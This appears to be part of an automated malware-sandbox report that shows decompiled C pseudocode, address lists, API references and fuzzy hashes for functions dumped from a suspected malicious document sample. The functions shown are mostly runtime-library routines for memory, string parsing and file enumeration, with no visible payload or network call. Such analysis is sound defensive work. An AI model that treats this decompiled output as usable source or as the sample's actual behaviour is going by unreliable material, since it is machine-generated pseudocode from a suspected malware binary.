Download Yara Rule

C-Code - Quality: 60%

			E0015D164(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x169008; // 0x26a91022
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E0015E5EF(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E0015B0CA(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E0015403C(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E0015BF54(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E0015B0CA(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E001599EA(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E001599EA(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E0015BF54(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E0015B146();
									if(_t95 != 0) {
										E0015BF54(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E00158BBC(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E001602F0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E001599EA(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E00158BBC(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E001602F0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x0015d169
0x0015d16a
0x0015d16b
0x0015d172
0x0015d177
0x0015d17d
0x0015d183
0x0015d189
0x0015d18c
0x0015d18c
0x0015d18f
0x0015d191
0x0015d191
0x0015d18f
0x0015d193
0x0015d198
0x0015d19f
0x0015d1a2
0x0015d1a2
0x0015d1c3
0x0015d1c5
0x0015d1c8
0x0015d1cd
0x0015d32b
0x0015d32e
0x0015d32f
0x0015d330
0x0015d33c
0x0015d1d3
0x0015d1d6
0x0015d1db
0x0015d1dd
0x0015d1df
0x0015d216
0x0015d218
0x0015d21a
0x0015d320
0x0015d320
0x0015d322
0x0015d323
0x0015d329
0x00000000
0x0015d329
0x0015d229
0x0015d22e
0x0015d233
0x00000000
0x00000000
0x0015d239
0x0015d250
0x0015d254
0x00000000
0x00000000
0x0015d25a
0x0015d262
0x0015d29f
0x0015d2a4
0x0015d2a6
0x0015d2a8
0x0015d2d9
0x0015d2db
0x0015d2dd
0x0015d319
0x0015d31a
0x00000000
0x0015d2fa
0x0015d2fc
0x0015d2fd
0x0015d301
0x0015d33d
0x0015d340
0x0015d303
0x0015d303
0x0015d304
0x0015d304
0x0015d305
0x0015d306
0x0015d307
0x0015d308
0x0015d310
0x0015d317
0x0015d346
0x00000000
0x00000000
0x00000000
0x00000000
0x0015d317
0x0015d2dd
0x0015d2ac
0x0015d2c7
0x0015d2cc
0x00000000
0x00000000
0x0015d2ce
0x0015d2d4
0x0015d2d4
0x00000000
0x0015d2d4
0x0015d2ae
0x0015d2b3
0x0015d2b7
0x00000000
0x00000000
0x0015d2b9
0x00000000
0x0015d2b9
0x0015d264
0x0015d269
0x00000000
0x00000000
0x0015d271
0x00000000
0x00000000
0x0015d28d
0x0015d291
0x00000000
0x00000000
0x00000000
0x0015d297
0x0015d1e6
0x0015d201
0x0015d206
0x0015d211
0x0015d211
0x00000000
0x0015d211
0x0015d208
0x0015d20e
0x0015d20e
0x00000000
0x0015d20e
0x0015d1e8
0x0015d1ed
0x0015d1f1
0x00000000
0x00000000
0x0015d1f3
0x00000000
0x0015d1f3

APIs

__alloca_probe_16.LIBCMT ref: 0015D1E8
__alloca_probe_16.LIBCMT ref: 0015D2AE
__freea.LIBCMT ref: 0015D31A

Part of subcall function 00158BBC: HeapAlloc.KERNEL32(00000000,00153522,?,?,00153CF2,0015352A,00000000,?,00153522,?), ref: 00158BEE

__freea.LIBCMT ref: 0015D323
__freea.LIBCMT ref: 0015D346

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 702b0026eaa503b9fe66378444d1843bcc0c325ebb079cc2defb881ca82dddf7
Instruction ID: 53cfc8f2f656bb2da67ef4674ba1496fbff6096d343513d4175c2c7cf432d4e3
Opcode Fuzzy Hash: 702b0026eaa503b9fe66378444d1843bcc0c325ebb079cc2defb881ca82dddf7
Instruction Fuzzy Hash: 4351C1B2900216EBEB355FA4EC81EBB37A9EF54752F154129FC24AF140E730DC5987A1

Uniqueness

Uniqueness Score: -1.00%

Function 00152327 Relevance: 7.6, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00152327(CHAR** __ecx, CHAR* _a4) {
				char* _v8;
				CHAR** _v12;
				char _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t26;
				CHAR* _t29;
				CHAR* _t30;
				CHAR* _t36;
				CHAR* _t39;
				void* _t40;
				void* _t45;
				char _t46;
				CHAR* _t51;
				char* _t56;
				CHAR** _t58;
				void* _t61;

				_push(__ecx);
				_push(__ecx);
				_t58 = __ecx;
				_v12 = __ecx;
				E001522FE(__ecx);
				_t36 =  *__ecx;
				_t16 =  *_t36;
				if(_t16 == 0) {
					L27:
					_t17 = 0x80020009;
				} else {
					_t56 = _a4;
					_v8 = _t56;
					if(_t16 != 0x27) {
						while(1) {
							_t19 = _t16 - 9;
							if(_t19 == 0) {
								break;
							}
							_t20 = _t19 - 1;
							if(_t20 == 0) {
								break;
							} else {
								_t21 = _t20 - 3;
								if(_t21 == 0 || _t21 == 0x13) {
									break;
								} else {
									_t23 = CharNextA(_t36);
									 *_t58 = _t23;
									_t24 = _t23 - _t36;
									_a4 = _t24;
									if(_t56 + 1 + _t24 >= _v8 + 0x1000) {
										goto L27;
									} else {
										_t45 = 0;
										if(_t24 > 0) {
											_t51 = _t24;
											do {
												 *_t56 = _t36[_t45];
												_t56 = _t56 + 1;
												_t45 = _t45 + 1;
											} while (_t45 < _t51);
										}
										_t36 =  *_t58;
										_t16 =  *_t36;
										if(_t16 != 0) {
											continue;
										} else {
											break;
										}
									}
								}
							}
							goto L28;
						}
						 *_t56 = 0;
						goto L26;
					} else {
						_t26 = CharNextA(_t36);
						 *_t58 = _t26;
						_t46 =  *_t26;
						if(_t46 == 0) {
							L14:
							if( *( *_t58) == 0) {
								goto L27;
							} else {
								 *_t56 = 0;
								 *_t58 = CharNextA( *_t58);
								L26:
								_t17 = 0;
							}
						} else {
							while(_t46 != 0x27 ||  *(CharNextA(_t26)) == 0x27) {
								_t29 =  *_t58;
								if( *_t29 == 0x27) {
									 *_t58 = CharNextA(_t29);
								}
								_t30 =  *_t58;
								_a4 = _t30;
								_t39 = CharNextA(_t30);
								 *_t58 = _t39;
								_t40 = _t39 - _a4;
								if(_t56 + 1 + _t40 >= _v8 + 0x1000) {
									goto L27;
								} else {
									if(_t40 > 0) {
										_t61 = _a4 - _t56;
										do {
											 *_t56 =  *((intOrPtr*)(_t61 + _t56));
											_t56 = _t56 + 1;
											_t40 = _t40 - 1;
										} while (_t40 != 0);
										_t58 = _v12;
									}
									_t26 =  *_t58;
									_t46 =  *_t26;
									if(_t46 == 0) {
										goto L27;
									} else {
										continue;
									}
								}
								goto L28;
							}
							goto L14;
						}
					}
				}
				L28:
				return _t17;
			}

0x0015232a
0x0015232b
0x0015232e
0x00152331
0x00152334
0x00152339
0x0015233b
0x0015233f
0x00152434
0x00152434
0x00152345
0x00152345
0x00152348
0x0015234d
0x001523db
0x001523de
0x001523e1
0x00000000
0x00000000
0x001523e3
0x001523e6
0x00000000
0x001523e8
0x001523e8
0x001523eb
0x00000000
0x001523f2
0x001523f3
0x001523ff
0x00152407
0x0015240b
0x00152410
0x00000000
0x00152412
0x00152412
0x00152416
0x00152418
0x0015241a
0x0015241d
0x0015241f
0x00152420
0x00152421
0x0015241a
0x00152425
0x00152427
0x0015242b
0x00000000
0x00000000
0x00000000
0x00000000
0x0015242b
0x00152410
0x001523eb
0x00000000
0x001523e6
0x0015242d
0x00000000
0x00152353
0x0015235a
0x0015235c
0x0015235e
0x00152362
0x001523c9
0x001523ce
0x00000000
0x001523d0
0x001523d0
0x001523d7
0x00152430
0x00152430
0x00152430
0x00152364
0x00152364
0x00152371
0x00152376
0x0015237b
0x0015237b
0x0015237d
0x00152380
0x0015238b
0x00152393
0x00152395
0x0015239c
0x00000000
0x001523a2
0x001523a4
0x001523a9
0x001523ab
0x001523ae
0x001523b0
0x001523b1
0x001523b1
0x001523b6
0x001523b6
0x001523b9
0x001523bb
0x001523bf
0x00000000
0x001523c1
0x00000000
0x001523c1
0x001523bf
0x00000000
0x0015239c
0x00000000
0x00152364
0x00152362
0x0015234d
0x00152439
0x0015243d

APIs

Part of subcall function 001522FE: CharNextA.USER32(?,?,00152339,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015231B

CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523F3

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 09c63ef6e9780a3c13462a3da479eab22ea1f7d26978d86ab0984c14f2f371ea
Instruction ID: d200bf5062a859741b89794f133bbb192ad9c9218d84d00d3cee6fc6802c5bb9
Opcode Fuzzy Hash: 09c63ef6e9780a3c13462a3da479eab22ea1f7d26978d86ab0984c14f2f371ea
Instruction Fuzzy Hash: 5941E036500282DFDB268F39C8946A9BBE4AF2B342F28456CD8D5DF306D3749C89C760

Uniqueness

Uniqueness Score: -1.00%

Function 0015BCA8 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0015BCA8(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1696e8; // 0x169738
					if(_t23 != 0) {
						E00158B82(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1696ec; // 0x292dd8
					if(_t24 != 0) {
						E00158B82(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1696f0; // 0x292dd8
					if(_t25 != 0) {
						E00158B82(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x169718; // 0x16973c
					if(_t26 != 0) {
						E00158B82(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x16971c; // 0x292ddc
					if(_t27 != 0) {
						return E00158B82(_t6);
					}
				}
				return _t6;
			}

0x0015bcae
0x0015bcb3
0x0015bcb7
0x0015bcbd
0x0015bcc0
0x0015bcc5
0x0015bcc9
0x0015bccf
0x0015bcd2
0x0015bcd7
0x0015bcdb
0x0015bce1
0x0015bce4
0x0015bce9
0x0015bced
0x0015bcf3
0x0015bcf6
0x0015bcfb
0x0015bcfc
0x0015bcff
0x0015bd05
0x00000000
0x0015bd0d
0x0015bd05
0x0015bd10

APIs

_free.LIBCMT ref: 0015BCC0

Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA

_free.LIBCMT ref: 0015BCD2
_free.LIBCMT ref: 0015BCE4
_free.LIBCMT ref: 0015BCF6
_free.LIBCMT ref: 0015BD08

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 586df1216655d68b17ac752f56920e282ee325f6333ec0562997423db554ffde
Instruction ID: b6d4fb4acae28133cd27455cc7286a2f75463b8fb4008e21e948be1a4041cfee
Opcode Fuzzy Hash: 586df1216655d68b17ac752f56920e282ee325f6333ec0562997423db554ffde
Instruction Fuzzy Hash: 7EF0FFB2518204EFCA20EF58E9C2C5673EDAB107677584905F825EB911CF70FC848A54

Uniqueness

Uniqueness Score: -1.00%

Function 0015A03C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0015A03C(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E00157F8F(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E0015CB84(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E0015749C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00159E27(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E0015CB84(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E0015A626(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00158B82(_t300);
														_t302 = _v12;
													}
													E00158B82(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E0015CB84(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0015749C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x169008; // 0x26a91022
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E0015D0C0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E0015A01F(_t244 - _t287 + 1, _t287,  &_v676, E0015A533(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00159F50( &(_v608.cFileName),  &_v640,  &_v609, E0015A533(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E00158B82(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E00158B82(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E0015CB90(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00159E84);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E00158B82(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E0015403C(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E00158B82(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E0015D080(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
